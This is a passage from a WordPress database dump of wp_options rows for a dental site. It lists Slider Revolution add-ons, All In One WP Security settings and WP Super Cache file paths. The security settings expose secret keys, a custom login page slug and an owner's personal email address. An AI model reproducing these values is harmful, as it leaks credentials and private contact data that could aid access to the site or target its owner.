content\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wprelated.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"5.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"1.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"1.1.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:80:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:84:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_snow.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_polyfold.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_404.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_login.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"1.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"1.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_weather.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:23:\"Display images in 360°\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_duotone.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reload.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}}', 'yes'),
(346, '_transient_timeout_bsf_check_product_updates', '1597968688', 'no'),
(347, '_transient_bsf_check_product_updates', '1', 'no'),
(375, 'rs_cache_overlay', '5.4.7.4', 'yes'),
(411, 'aiowpsec_db_version', '1.9', 'yes'),
(412, 'aio_wp_security_configs', 'a:89:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"nosmw3jhhb18pz24fwyd\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"e7v1mp5ibmjo111nvav3\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:21:\"markavincim@gmail.com\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:22:\"aiowps_login_page_slug\";s:7:\"yonetim\";s:35:\"aiowps_enable_lost_password_captcha\";s:0:\"\";}', 'yes'),
(416, 'ossdl_off_cdn_url', 'http://www.ze-dent.com', 'yes'),
(417, 'ossdl_off_blog_url', 'http://www.ze-dent.com', 'yes'),
(418, 'ossdl_off_include_dirs', 'wp-content,wp-includes', 'yes'),
(419, 'ossdl_off_exclude', '.php', 'yes'),
(420, 'ossdl_cname', '', 'yes'),
(421, 'wpsupercache_start', '1531824578', 'yes'),
(422, 'wpsupercache_count', '0', 'yes'),
(424, 'wpsupercache_gc_time', '1597052574', 'yes'),
(425, 'wpsc_feed_list', 'a:51:{i:0;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:1;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:2;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:3;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:4;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:5;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:6;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:7;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:8;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:9;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:10;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:11;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:12;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:13;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-68a583d44a63d729135e8f4c73b2dc49.php\";i:14;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:15;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:16;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:17;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:18;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:19;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:20;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-6d17c24f6802887e75376cf516379641.php\";i:21;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:22;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:23;s:135:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/rdf/wp-cache-bcc64e31237cd8e74b4d95641d493f32.php\";i:24;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:25;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:26;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:27;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:28;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:29;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:30;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:31;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-4c52e285096ad124828fe16fbab00ba2.php\";i:32;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:33;s:135:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/rdf/wp-cache-bcc64e31237cd8e74b4d95641d493f32.php\";i:34;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:35;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www